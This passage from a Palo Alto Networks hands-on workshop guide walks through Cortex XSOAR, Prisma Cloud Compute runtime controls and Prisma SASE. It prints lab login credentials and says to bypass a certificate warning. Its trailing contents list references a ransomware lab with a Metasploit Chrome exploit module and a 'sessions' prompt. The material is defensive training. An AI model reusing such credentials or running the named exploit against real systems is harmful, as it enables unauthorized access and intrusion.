logs generated by our security offerings, including those of our ML-Powered Next-Generation
Firewalls, Prisma Access and Cortex XDR. The Cortex Data Lake is the cornerstone of the Palo
Alto Networks Cortex platform which provides a scalable ecosystem of security applications that
can apply advanced analytics in concert with Palo Alto Networks enforcement points to prevent
the most advanced attacks.
Cortex XSOAR is the industry-leading Security Orchestration, Automation & Response (SOAR)
technology that can automate many response actions requiring human review and allow
overloaded security teams to focus on the actions that really require their attention.
Task 1 – Cortex XSOAR Ecosystem
Effective security orchestration is about making different products integrate with each other and
automating tasks across products through workflows, while also allowing for human oversight and
interaction. To achieve that goal, Cortex XSOAR integrates with security and non-security technologies,
based on what our SOC customers need to streamline and automate their incident response end-to-end.
Cortex XSOAR is the industry-leading Security Orchestration, Automation & Response (SOAR)
technology by Palo Alto Networks that will automate up to 95% of all response actions requiring human
review and allow overloaded security teams to focus on the actions that really require their attention.
Cortex XSOAR orchestration enables security teams to ingest alerts across sources and execute
standardized, automatable playbooks for accelerated incident response. Cortex XSOAR playbooks are
complemented by real-time collaboration capabilities that let security teams rapidly iterate to solve
emergent threats.
The Cortex XSOAR ecosystem includes over 900 integrations and content packs from Palo Alto
Networks, our technical partners, and community, available in the Cortex XSOAR Marketplace. In this
task, we will show you how you can easily access many integrations in Cortex XSOAR.
Step 1: Click on the Cortex XSOAR GUI tab to open a browser to the XSOAR lab instance. You are
accessing a private instance, accept the security warning and go to the login page.
Log in with:
Username : student
Password: Xsoar@utd135
Step 2: After successfully logging into the Cortex XSOAR lab instance, you will see the Dashboards of
the XSOAR instance. Since this is a lab instance, it does not have much data in it.
Step 3: Hover your mouse over the black panel on the left-hand side, it will open up and provide more
context on the icons. Click on Marketplace:
Step 4: The Cortex XSOAR Marketplace provides access to the integrations, content packs, playbooks
and more offered by the Cortex XSOAR team and our partners. Feel free to explore the various
integrations that are available. Enter Palo Alto Networks in the search bar to see some of the content
packs for the different Palo Alto Networks products and services that can be integrated with Cortex
XSOAR.
Step 5: You can see the content packs that are currently installed on the XSOAR lab instance by going to
the Installed Content Packs tab. XSOAR marketplace frequently provides updates to the content packs
and you will likely see some new updates available.
Step 6: Look for the PAN-OSs content pack under the Content Packs Library using the search bar and
review the Details and Content tabs on the right. You will be able to see the Integrations and
Playbooks that come with this content pack.
Step 7: Search for ipinfo in the search bar under Content Pack Library, you should not find it under the
Installed Content Packs as this package is not currently installed.
Step 8: Most content packs will require further setup and configuration after it is installed in your XSOAR
server. You can find the configuration under Settings > Integrations > Instances. Select Enabled next
to Show to filter out just the content packs that are enabled.
You can click on the gear icon on the right to review the configurations of the content pack. Take
a quick look at the Palo Alto Networks WildFire Reports or any other content pack
configurations. Do not make any changes.
Step 9: Cortex XSOAR enables you to run system commands, integration commands and automations
from an integrated command line interface (CLI). The XSOAR CLI is located at the bottom of the GUI and
it is available throughout the XSOAR. You should see one at the bottom of the Settings page.
Step 10: We will test a command here. To run a command in the XSOAR CLI, start the command with !
followed by the command. Execute the following command: !ip 8.8.8.8
Step 11: Cortex XSOAR will take you to the Playground page where commands are executed. Click Yes,
execute in playground to execute the command.
Step 12: You should get an error message from DBot, because this command does not exist yet. We will
install the content that will provide the support for this command in the next task.
Task 2 – Install and test a new Integration from XSOAR Marketplace

In this task, you will install a new content pack and see how you can use it in the CLI.
Step 1: Go to Marketplace > Browse and search for the ipinfo content pack in the search bar.
Step 7: Click on the ipinfo and install it using the install button on the right, this is one of the many free
content packs available in XSOAR.
Step 8: After successfully installing the content pack, we will set it up by going to Settings > Integrations
> Servers & Services. Set the Show filter to All and use the search bar to search for the ipinfo
integration. Click Add instance for the IPinfo v2 integration. (Note: Do not use the Deprecated version.)
Step 9: You can review the instance settings and then click Save & exit to complete the setup.
Step 10: After adding the instance, you should see a new ipinfo instance added. You can click on the
gear icon to open the setting page and run a test to see if the new instance is functional.
Step 11: Issue an ip command to test this new instance. Go to the built-in XSOAR CLI at the bottom and
enter !ip 8.8.8.8 using= , select the ipinfo instance that you have just installed and hit enter to execute
the command. Click Yes, execute it in the playground.
Step 12: Notice that with the same command, you can get a different result from a different integration.
You have successfully added a new integration and use it in XSOAR.
Task 3 – Cortex XSOAR Playbook Example
Cortex XSOAR Playbooks are self-contained, fully documented prescriptive procedures that query,
analyze, and act based on the gathered results. Playbooks enable you to organize and document security
monitoring, orchestration, and response activities. There are several out-of-the-box playbooks that cover
common investigation scenarios. You can use these playbooks as-is or customize them according to your
requirements.
A key feature of Playbooks is the ability to structure and automate security responses, which were
previously handled manually. You can reuse Playbook tasks as building blocks for new playbooks, saving
you time and streamlining knowledge retention.
Cortex XSOAR Playbooks are at the heart of the Cortex XSOAR system, and it is outside the scope of
this workshop. We will show you a simple playbook here as a quick demonstration of what a playbook can
do.
Step 1: Go to the Playbooks on the left to access all the playbooks that are currently available in your
XSOAR system. There are many playbooks pre-installed from the content packs.
Step 2: We have created a very simple playbook here for this workshop. Click on the
01_utd_allow_fortnite playbook and you will see that there are a few simple tasks in this playbook.
Step 3: Click on the first task Notify Network Team to review this task. This is a manual task and while it
does not provide any automated action, it serves as a good demonstration of how the playbook works
later. Close the task window.
Step 4: Double click on the Add_fortnite_policy_to_panorama task, this task uses the
panorama-create-rule command. Review the fields under the Inputs tab that defines the policy that will
be created in Panorama when this task is executed. Close the task window without making any changes.
Step 5: Before we show you how to execute this playbook, let’s go back to Panorama to see what we
have there before the automation. Go back to the Panorama GUI, then go to Policies > Security > Pre
Rules, select Cortex-XSOAR-DeviceGroup in the Device Group drop down. You should see no
pre-rule in this device group.
Task 4 – Incidents and Playbook

Incidents are events that have been observed at a point in time and saved for analysis. Incidents can be
ingested from third party integrations, created manually through the user interface, or generated through
the REST API. We will create a simple incident to demonstrate the playbook you just reviewed.
Step 1: Go back to the Cortex XSOAR GUI, go to Incidents. Since this is a lab instance, there is no
incident here so let’s create one.
Step 2: Click New Incident to create a new incident.
Step 3: In the new incident window, enter and select the following and click Create New Incident to
create it.
Name: Boss wants to play Fortnite

Owner: student
Type: Network
Severity: Medium
(set as High if performance review is coming soon!!)
Playbook: 01_utd_allow_fortinet
Step 4: Scroll down in the Incidents window and click the incident ID for the incident that you just created.
It will open the Incident Info window.
Step 5: In the Incident Info window, you can see that the playbook for this incident is already running
and there is a task waiting for the user to complete.
Step 6: You can click on either the Tasks Pane or Works Plan to view the task. The Task Pane is best
for simple tasks we have here, so we use that here. Note that the next task has not been executed, so
you can check the Panorama GUI that there should be no pre-rule in the Cortex-XSOAR-DeviceGroup.
Step 7: There are few options you can do in the task window, but we will keep it simple by clicking on
Mark Completed to tell XSOAR this task is done and move on to the next task in the playbook.
Step 8: You will see the remaining task in the playbook being executed and notified when the last task is
done.
Step 9: After the playbook is executed, you can go back to the Panorama GUI and you should find a new
firewall rule is now added in the Cortex-XSOAR-DeviceGroup.
Now, the team just needs to push this policy update to the firewalls and your boss should be playing
Fortnite happily in no time.
Task 5 – Other Cortex XSOAR Resources
We have only scratched the surface of Cortex XSOAR here and some of the common XSOAR use cases
include:
● SECOPS Workflow Automation
● Incident Case Management
● Threat Intel Management
● Network Security Automation
To learn more about what Cortex XSOAR can do for you, we invite you to take a quick look at this short
video.
https://www.youtube.com/watch?v=DYJX9KFnJNo&feature=youtu.be
If you would like to give Cortex XSAOR a try in your own environment, you can register for the XSOAR
Community Edition to get a free trial of the full-featured version. Please visit the follow site to learn more
about the Cortex XSOAR Community Edition.
https://start.paloaltonetworks.com/sign-up-for-community-edition.html
End of Activity 5
Activity 6 – Protection for Public Cloud with
VM-Series and Prisma Cloud
Network protection must be adapted for cloud native environments while still enforcing consistent
policies across hybrid environments. Leveraging a single security tool with consistent control, the
VM-Series virtual firewalls provide comprehensive network visibility and advanced threat
protection across multi-cloud and hybrid cloud environments. The VM-Series virtual firewalls can
be deployed in many public cloud environments such as Microsoft Azure, Amazon Web Services
(AWS), Google Cloud Platform (GCP) and Oracle Cloud, so the same advanced security policies
and control can be applied across different cloud services and managed from the same user
interface.
The move to the cloud has changed all aspects of the application development lifecycle – security
being foremost among them. Security and DevOps teams face a growing number of entities to
secure as the organization adopts cloud native approaches. Ever-changing environments
challenge developers to build and deploy at a frantic pace, while security teams remain
responsible for the protection and compliance of the entire lifecycle. Prisma™ Cloud delivers
complete security across the development lifecycle on any cloud, enabling you to develop cloud
native applications with confidence.
In this activity, we will take a quick look at how the VM-Series for Public Cloud and Prisma Cloud
products offer comprehensive security for your journey to the public cloud.
You have experienced some of the VM-Series ML-Powered Next-Generation Firewall capability in
the previous lab activities. The same VM-Series NGFW can be deployed in various public cloud
services to protect your infrastructures the same way it does in the data center. We will take a
quick look at how VM-Series can be deployed to protect your public cloud infrastructure.
Task 1 – VM-Series ML-Powered Next-Generation Firewall for the

Public Cloud
VM-Series can be deployed directly from many public cloud marketplaces. Visit your public cloud provider
marketplace and search for Palo Alto Networks to access all the Palo Alto Networks products available on
the public cloud providers. Here are some examples:
Amazon Web Services (AWS) Marketplace
https://aws.amazon.com/marketplace/search/results?x=0&y=0&searchTerms=Palo+Alto+Networks
Google Cloud Platform (GCP) Marketplace:
https://console.cloud.google.com/marketplace/browse?q=Palo%20Alto%20Networks
Microsoft Azure Marketplace:
https://azuremarketplace.microsoft.com/en-us/marketplace/apps?search=Palo%20Alto%20Networks&pag
e=1
Various licensing models are available for VM-Series in the public cloud deployment. Bring Your Own
License (BYOL) or Enterprise License Agreement (ELA) models are available for customers with current
licenses. Or you can choose between the Bundle 1 or Bundle 2 Pay As You Go (PAYG) license that offers
different subscription bundles.
With a valid public cloud account, you can deploy a VM-Series in your public cloud account using the Pay
As You Go (PAYG) license even if you don’t have an existing license from Palo Alto Networks. Please
note fees are applicable to both license and other public cloud service charges.
Palo Alto Networks offers workshops where you can learn more on how to deploy the VM-Series and
CN-Series in AWS, Azure and GCP. Please discuss with your instructor to learn more about our offerings
for the public clouds.
Task 2 – Manage and Deploy VM-Series in Public Cloud with

Panorama Plugins
Panorama offers easy-to-implement and centralized management features for the VM-Series NGFW so
you can implement the same security policy across different public cloud providers. The Panorama
extensible plugin architecture enables support for the various public cloud providers so you can select
what you need. We will take a quick look at the Panorama Plug-ins for the supposed public cloud
providers.
Step 1: Go to the Panorama GUI, go to the Panorama tab and scroll down on the left hand side and you
should see the AWS, Azure and Google Cloud Platform nodes under the Plugins node.
Step 2: Click on the AWS node to open and review the supported features in the plugin.
Step 3: Deployments is a new feature added to the latest AWS plugin, which enables you to orchestrate
VM-Series firewall deployments from Panorama. Click on Add to open up the deployment configuration
window to review some of the options.
Step 4: Review some of the other plugin options that are available in the Azure and Google Cloud
Platform plugins.
Palo Alto Networks also offers CN-Series container next-generation firewalls that enables visibility and
control over Kubernetes environments. With native Kubernetes integration and centralized management
in Panorama through the Kubernetes plugin, you can easily integrate CN-Series firewall provisioning
through the same management platform.
Step 5: Go to the Kubernetes plugin, you can see all the supported Kubernetes type in the Cluster tab
when you add a new cluster.
Step 6: Click on Plugins node. Here is where you can download and update to the latest plugin version
and access the latest features in the respective public cloud providers in Panorama. We hope this gives
you a quick look on how Panorama can help to manage your Palo Alto Networks firewall across multiple
Public Cloud servers. With the read-only Panorama account, you will not be able to update or refresh the
plugins list.
Task 3 – Resources for VM-Series in Public Cloud
Step 1: Visit the Palo Alto Networks Live community where you can find a lot of resources in the Getting
Started with VM-Series for Public Cloud page. Select the public cloud service provider of your interest and
you will find many useful tips and help to get you started.
https://live.paloaltonetworks.com/t5/Getting-Started-With-VM-series/ct-p/Getting-Started-Public-Clouds
Step 2: For example, select the AWS to visit the AWS Resource Page.
https://live.paloaltonetworks.com/t5/AWS/ct-p/AWS
Step 3: Palo Alto Networks also shared many deployment samples, script files, SDK and more through
GitHub. Feel free to explore our GitHub repositories for tools that could help your journey in the Public
Cloud.
https://github.com/PaloAltoNetworks
Task 4 – Quick Look at Prisma Cloud and Prisma Cloud Compute

Edition
Prisma Cloud is a comprehensive cloud-native security platform with the industry’s broadest security and
compliance coverage. It protects cloud native applications, data, network, compute, storage, users, and
higher-level PaaS services across cloud platforms. Prisma Cloud enables Cloud Security Posture
Management (CSPM) and Cloud Workload Protection Platform (CWPP) for comprehensive visibility and
threat detection across your organization’s hybrid, multi-cloud infrastructure. It dynamically discovers
resources as they are deployed and correlates cloud-service-provided data to enable security and
compliance insights into your cloud applications and workloads.
Prisma™ Cloud continuously ingesting data using hundreds of cloud service provider APIs and threat
intelligence sources, creates a massive data lake on your public cloud deployment. It applies policy- and
machine learning-based analysis to discover and classify assets, flag compliance and governance
violations, detect suspicious activities, and identify data risk. Interactive reports and investigation
capabilities enable rapid incident investigations. Finally, issues are automatically remediated via API
integration with your favorite tools or directly within the Prisma Cloud console itself.
Prisma Cloud Compute Edition (PCCE) is a self-hosted offering that’s deployed and managed by you. It
includes the Prisma Cloud Compute module only. You can download the Prisma Cloud Compute Edition
software from the Palo Alto Networks Customer Support Portal. Compute Console is delivered as a
container image, so you can run it on any host with a container runtime (e.g. Docker Engine). We will use
the PCCE VM hosted in your lab environment in this and the next activity.
Let’s login to the Prisma Cloud Compute Edition GUI
Step 1. Click on the PCCE GUI tab to open a new browser tab to the Prisma Cloud Compute Edition GUI.
Step 2. When you see the warning message Your connection is not private , click Advanced, and then
Proceed to <URL> (unsafe) to bypass the warning message and move on to the login page.
Step 3. Login to the PCCE console using the following credentials, with Local/LDAP in the drop down:
Username: student
Password: Utd!35
Step 4. Once logged in, you will be placed in Radars, the primary interface for monitoring and
understanding your environment. It is designed to let you visualize and navigate through Prisma
Cloud Compute’s data. Click on any container to view the details on that container. The defender and
the console containers are the key components for Prisma Cloud Compute Edition.
Step 5. Clicking on shellinabox:0.1 container will bring up a detailed view on the status of the container.
You can view the different types of alerts for the container.
Step 6. Click on Vulnerability or Compliance to view the alerts.
Step 7. Click Radars > Hosts, then click the prismacompute host icon to review the host dashboard.
You can view the alerts for the host where all the containers are running on. Note that there is only one
host in this lab. All the containers and the Prisma Cloud Compute Edition are running on the same host.
Step 8. Check the Container models state by navigating to Monitor > Runtime > Container Models.
Step 9. If the state of the shellinabox container is Active, then proceed to the next step.
Note: If the state is in Learning, then click on three dots in the Actions column, start and stop the
Manual Relearning by clicking it twice and that should put the container state back to active.
Step 10. Go to Monitor > Events > Container audits and review the audit alerts there. Scroll down and
you should see no alerts from the shellinabox container.
In the next task, we will login to the shellinabox container and demonstrate how PCCE can monitor
container activity
Task 5 – Monitoring and Control Container Process with Prisma Cloud
In this task, we will use the shellinabox container to demonstrate how Prisma Cloud Compute Edition
detects and blocks the process executed in a container. We will login to PCCE-VM to confirm that the
shellinabox container is running and then login to the shellinabox container to execute some commands
in the container.
Step1. Click on the PCCE-VM tab to access the PCCE-VM terminal. The PCCE-VM tab should provide
you with SSH access to the PCCE VM.
Step 2. The prompt shows you that you are in the prismacompute VM. Use the docker ps command to
show the containers running in this VM. You should see the shellinabox container running.
Step 3. Then, run a bash shell in shellinabox container using the command script shortcut
./shellinabox-bash
Note the “ ./ ” in front of the command. The change in prompt that indicates you are in the bash shell of
the container.
Step 4. Run the command top in the container. You can see the top command running. To exit out of the
top command, press q or CTRL+C.
Step 5. Now run the following ping command and the container should allow the process to go through.
ping -c 3 www.google.com
ping -c 3 www.yahoo.com
Step 6. Return to the PCCE GUI and in Monitor > Events > Container Audits, you should see the alerts
generated by the top and ping commands from the previous steps. Review the message and rule of the
alert.
Step 7. Now, we will create a rule to prevent the ping command from running in the shellinabox container.
Go to Monitor > Runtime > Container models.
Step 8. Click on the Action button (3 dots) for the shellinabox image, then click Copy into rule to create
a new rule.
Step 9. In the Create new runtime rule window, keep the rule name, add My new runtime rule in the
Notes. Then go to the Processes tab, add /bin/ping under Allowed - Processes and select Prevent
under Denied & fallback.
Note that the top command is not in the allow processes list.
Step 10. Click Save to save the new rule. You will be able to find this new rule in Defend > Runtime >
Container policy.
Step 11. Now go back to the PCCE-VM where you are running the bash shell in the shellinabox
container. Run the top and ping commands again and you should see the top command is not permitted
while you can still run the ping command as we have added it to the allowed process list.
We hope this short lab shows you a few simple features of the Prisma Cloud product. We invite you to
take a quick look at a short demo video on Prisma Cloud to learn more about Prisma Cloud.
https://www.youtube.com/watch?v=ZV1vARR4VkY
Palo Alto Networks offers a Cloud Native Security

Platform workshop where you can learn more Prisma
Cloud which provides Cloud Security Posture
Management (CSPM) and Cloud Workload Protection
Platform (CWPP). Please discuss with your instructor to
arrange one for your team or register to one of our online
events here.
End of Activity 6
Activity 7 – Quick Look at Prisma SASE (Secure
Access Service Edge)
Digital transformation, cloud adoption, and remote work have eroded physical perimeters, driving
infrastructure and security transformation in the enterprise. Organizations need a scalable way of
securing remote access for every user and branch location. Secure Access Service Edge (SASE)
converges best-of-breed networking and security into a single solution purpose-built for agile,
cloud-enabled organizations. Prisma® SASE is the industry’s only complete SASE solution,
converging network security, SD-WAN, and Autonomous Digital Experience Management (ADEM)
in the cloud. Only Prisma SASE uniquely and consistently delivers cloud-delivered security
services to secure all apps used by your hybrid workforce, regardless of whether users are
remote, mobile, or working from a branch office

● See how Prisma Access provides the foundation for consistent cloud-delivered security.
● Learn about Prisma SD-WAN key architectural benefits
● See how Autonomous Digital Experience Management (ADEM) can help you to gain end-to-end
visibility across your network
Task 1 – Introduction to Prisma Access
Prisma Access delivers a secure access service edge (SASE) that provides globally distributed
networking and security to all your users and applications. Whether at branch offices or on the go, your
users connect to Prisma Access to safely access cloud and data center applications as well as the
internet.
We invite you to take a quick look at the following short video to learn more about how this
cloud-delivered protection addresses requirements for secure access to applications with global
coverage.
https://www.youtube.com/watch?v=D7s4kA1GRkw
Task 2 – Cloud Management for Prisma Access
Prisma Access Cloud Management is a simple yet powerful cloud-delivered solution that enables
comprehensive security management through a single security rule base, with simplified workflows to
address use cases in threat prevention, URL filtering, application awareness, user identification,
sandboxing, file blocking, and access control. It provides complete visibility into the entire deployment
alongside actionable insights to help improve the end user experience. This crucial simplification of
security management and continuous assessment of Palo Alto Networks-defined best practices allow you
to improve your organization’s security posture. We are going to take a quick look at the Cloud
Management for Prisma Access in this task
Step 1. Click on the Prisma Access tab to go to the login page for the Cloud Management UI.
It can take a minute to connect and display the login page.

Step 2. The username, utd-sase@pan-labs.net should already be filled in.
Click Next.
Step 3. The password will automatically fill-in.
Click Sign In.
Step 4. You should be on the Overview page. If not, click Manage > Service Setup > Overview.
For day-to-day management, you can check in here to:

● Get at-a-glance configuration status
● Restore an earlier configuration version, to recover from a configuration push with unintended
impacts to traffic flow or security
● Identify unused objects and rules and clean up your configuration
● Pinpoint areas where you can make configuration changes that would strengthen your security
posture
Note that you are looking at a demo Prisma Access instance so you may see more error messages and
failed checks than an actual functioning instance.
Step 5. In the Basics widget, you will find some simple onboarding checks to help you with your Prisma
Access setups. Click on the 1st Onboard Mobile Users (GlobalProtect) to review the GlobalProtect
Setup for mobile users. Note that Prisma Access was previously known as GlobalProtect Cloud
Services and therefore you will still see the name in some parts of the GUI.
Step 6. After you have reviewed the mobile user setup, go to Manage > Configuration > Security
Services > Security Policy where you can review the security policies configuration for Prisma
Access.
Step 7. Scroll down and under Security Policy Rules, click on the name of one of the rule to open the
policy window and review the policy details.
Step 8. The policy window may look different from the Pan-OS security rule but they have the same
parameters such as Source / Destination Zones and Addresses, Applications, Services and
Protection Profiles.
If you are familiar with Palo Alto Networks Pan-OS configuration, you will feel familiar with the Prisma
Access configuration in Cloud Management.
Next, we are going to take a quick look at the Autonomous Digital Experience Management (ADEM) in
Prisma Access.
Task 3 – Autonomous Digital Experience Management (ADEM)

Autonomous Digital Experience Management (ADEM) natively integrated into Prisma Access. With
ADEM, you can monitor end user experience and provide segment-wise insights across the entire
application delivery path. IT teams can determine whether the issue is caused by the user’s laptop, poor
WiFi signal strength, poor broadband WAN connectivity, middle mile Internet Service Provider (ISP)
issues, cloud or data center connectivity or a SaaS provider issue.
Step 1. Navigate to Autonomous DEM > Summary. Change the Time Range to Past 7 Days to see
more data.
Step 2. Scroll down to see the overall Experience Score, Experience Score Across Network where
you can get a quick sense if any users are impacted by different issues. You can also see the
Experience Score for the monitored applications.
Step 3. Navigate to ADEM > Applications where you can take a closer look at the traffic distribution and
the application experience scores monitored by ADEM.
Step 4. Click on any application to review the experience score tread on the application and the
experience score across the network.
Step 5. Navigate to Users and Prisma Access Locations to further explore what ADEM can bring to
you.
In the next task we will take a quick look at the other major component in the Prisma SASE solution, the
Prism SD-WAN.
Task 4 – Prisma SD-WAN

Prisma SD-WAN is a core component in delivering Secure Access Service Edge (SASE) for the modern
enterprise. At the core of the system is the application performance engine. Prisma SD-WAN provides a
software-defined, wide area network (SD-WAN) solution that transforms legacy wide area networks
(WANs) into a radically simplified, secure, application fabric (AppFabric), virtualizing heterogeneous
underlying transports into a unified hybrid WAN.
The Prisma SD-WAN solution includes two key elements:
SD-WAN Controller - Access the SD-WAN controller through an intuitive graphical user interface that
helps you manage your network.
ION Devices – ION (Instant-On Network) devices enable you to combine disparate WAN networks, such
as; MPLS, LTE, and internet links, into a single, high-performance, hybrid wide area network (WAN).
The Prisma SD-WAN web interface is the starting point for all Prisma SD-WAN-related tasks and activities
for your enterprise. Through the web interface, you can set up, administer, monitor, and troubleshoot
sites, devices, networks, and applications. You can monitor application performance on all networks,
secure and control applications and networks through network and security policies. You can also isolate
and troubleshoot issues within the network through the alerts and alarms.
The Prisma SD-WAN web interface contains six key tabs to configure, monitor, and troubleshoot your
wide area network and its applications – Dashboard, Map, Policies, Activity, Reports, and
CloudBlades. We will take a quick look at the Prisma SD-WAN web interface here.
Step 1. In the Prisma Access GUI, go to the All Applications at the lower left hand corner and switch to
the Prisma SD-WAN application, select the first instance.
Step 2. Once you have switched to the Prisma SD-WAN application, you should be placed in the Monitor
> Summary view. If not, Monitor is the first icon on the left.
The Dashboard and Link Quality Details dashboards give you visibility into the device connectivity
status for all the sites. The Link Quality Details metrics dashboard provides a snapshot of the current
state of the links that you are monitoring. You gain insight over the Link MOS (Mean Opinion Score), Link
Packet Loss, Link Jitter, and Link Latency from the dashboard.
Step 3. To see all the sites in the SD-WAN network, click on Sites in Monitor. In Map view, zoom out to
see the other sites. Or switch to the List View to view the list of sites.
Step 4. Click on the New York (Brach1) or the Chicago (Branch2) to open the Site Summary
dashboard. The site summary dashboard provides an information-rich display of branch-related
metrics. These include new metrics such as network health as well as existing network, device and
application metrics.
The Site Health Overview widget contains the Current Best Health Score and the Overall Site
Consumed Bandwidth. Each of these metrics has a time series view that is displayed upon clicking.
The Current Overall Consumed Bandwidth metric displays current total bandwidth consumption,
ingress and egress bandwidth consumption as a raw value and as a percentage of the total available.
Upon clicking the tab a time series chart of the ingress and egress consumed bandwidth are displayed in
reference to the total configured bandwidth at the site.
The Circuit Connectivity And Health widget displays the time-series graphs for the health score of the
best performing tunnel and the circuit bandwidth utilization between the configured ingress/egress and the
actual ingress/egress over time.
Scroll down to see what other important information that is available to you in the Suite Summary
Dashboard.
Next we will go to the Activity tab under Monitor to take a closer look at the network and individual
applications across the different sites.
Step 5. Go to the Activity tab, select Network if not already selected.
The Activity tab provides a view of the activity charts of the network and individual applications through
network analytics, media analytics, link quality, flow browser, routing statistics, and system information
related data.
You can use Quick Filters on the left to drill down into traffic per site, per request, and per WAN path.
Quick filters provide a way to display granular analytics on the network or its applications.
Step 6. In the left-hand column, under Quick Filters, click the pencil icon for Apps and Sites to edit and
select an application and site. A Pop-up window will prompt you to update the chats, choose Not Yet
before you finish selecting and select Update to update the charts when you are done with your
selections.
This is just a quick and short introduction to Prisma SD-WAN. We invite you to look at this short Prisma
SD-WAN demonstration video to learn more about Prisma SD-WAN.
https://www.youtube.com/watch?v=lJIwL7iAsks
Palo Alto Networks also offers an Ultimate Test Drive for Secure Access Service Edge (SASE) where you
can learn more about the different use cases with Prisma Access and Prisma SD-WAN. Please talk with
your instructor if you are interested to learn more about Prisma SASE.
End of Activity 7
Activity 8 - Feedback on Ultimate Test Drive
Thank you for attending the Ultimate Test Drive event. We hope you enjoyed the presentation and the
labs that we have prepared for you. Please take a few minutes to complete the online survey form to tell
us what you think about this event.
Task 1 – Take the online survey

Step 1: In your lab environment, click on the Survey tab on the left.
Step 2: Please complete the survey and let us know what you think about this event.
End of Activity 8
Lab Setup
Firewall VM-Series

Interface: Int Type: IP Address: Connects to Zone:

Management - 10.30.21.1
Ethernet 1/1 L3 172.16.2.1 Untrust
Ethernet 1/2 L3 10.80.2.1 Intranet
Ethernet 1/3 L3 192.168.21.1 Trust
Ethernet 1/4 Tap Tap (Not used)

UTD-CybersecurityPortfolio-2.2 Workshop Guide-20221123

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

UTD-CybersecurityPortfolio-2.2 Workshop Guide-20221123

Uploaded by

Copyright:

Available Formats

infosec-saas-sec-exception-4FolG6vM0bWM0mpeYVe1Q8UaS

Task 2 - Understand the UTD Environment Setup 6

Task 3 - Enable Internet Access on the ML-Powered Next-Generation Firewall 7

Task 4 – Install Cortex XDR Agent on Protected Client 8

Task 2 - Check Attacker VM Status 11

Task 3 - Compromise Victim System via Exploit 12

Task 4 - Attacker to Upload and Execute the Ransomware on Victim 13

Task 5 - Execute Ransomware on the Victim Client 15

Task 6 - Test Ransomware on the Protected Client 16

Task 2 - Review the Policy for the Protected Client 20

Task 4 - Re-Run the Ransomware Attack on the Protected Client 24

Task 2 – Introduction to Cortex XDR 28

Task 3 – Login and Review Cortex XDR 29

Task 3 – Manage NGFW policies with Device Groups 38

Task 2 – Install and test a new Integration from XSOAR Marketplace 43

Task 3 – Cortex XSOAR Playbook Example 45

Task 4 – Incidents and Playbook 46

Task 5 – Other Cortex XSOAR Resources 49

Task 3 – Resources for VM-Series in Public Cloud 54

Task 5 – Monitoring and Control Container Process with Prisma Cloud 59

Task 2 – Cloud Management for Prisma Access 64

Task 3 – Autonomous Digital Experience Management (ADEM) 67

Task 4 – Prisma SD-WAN 68

Task 1 – Log in to Your Ultimate Test Drive Class Environment

Enter your email address and the class passphrase.

Task 2 - Understand the UTD Environment Setup

Log in to the firewall with the following name and password:

Task 4 – Install Cortex XDR Agent on Protected Client

Task 1 - Brief Overview of Ransomware Attack Sequence

Via CloudShare controls, click: keyboard > send password.

msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions

There should be no active sessions on the Attacker VM.

Task 3 - Compromise Victim System via Exploit

Task 4 - Attacker to Upload and Execute the Ransomware on Victim

msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions

Task 5 - Execute Ransomware on the Victim Client

Congratulations! You are now an attacker and a victim.

Task 6 - Test Ransomware on the Protected Client

Task 1 - Review the Port-Based Policy for the Victim

Task 2 - Review the Policy for the Protected Client

Task 3 - Re-Run the Ransomware on the Protected Client Without URL

Task 4 - Re-Run the Ransomware Attack on the Protected Client

Task 1 - Review the Cortex XDR Client Console

Task 2 – Introduction to Cortex XDR

Task 3 – Login and Review Cortex XDR

Note: you will be using a Read-Only account.

Task 1 – Log into Network Security Management: Panorama

Login to Panorama with the following Read-Only account:

Step 3: Navigate to the Objects > Log Forwarding, ensure Cortex_Data_Lake_Device_Group is

Step 5: Check the Pre Rules in the Cortex-Xsoar-DeviceGroup and the

Task 1 – Cortex XSOAR Ecosystem

Task 2 – Install and test a new Integration from XSOAR Marketplace

Task 4 – Incidents and Playbook

Name: Boss wants to play Fortnite

Task 1 – VM-Series ML-Powered Next-Generation Firewall for the

Amazon Web Services (AWS) Marketplace

Microsoft Azure Marketplace:

Task 2 – Manage and Deploy VM-Series in Public Cloud with

Task 4 – Quick Look at Prisma Cloud and Prisma Cloud Compute

Let’s login to the Prisma Cloud Compute Edition GUI

Step 6. Click on Vulnerability or Compliance to view the alerts.

Palo Alto Networks offers a Cloud Native Security

In this activity, you will:

Task 1 – Introduction to Prisma Access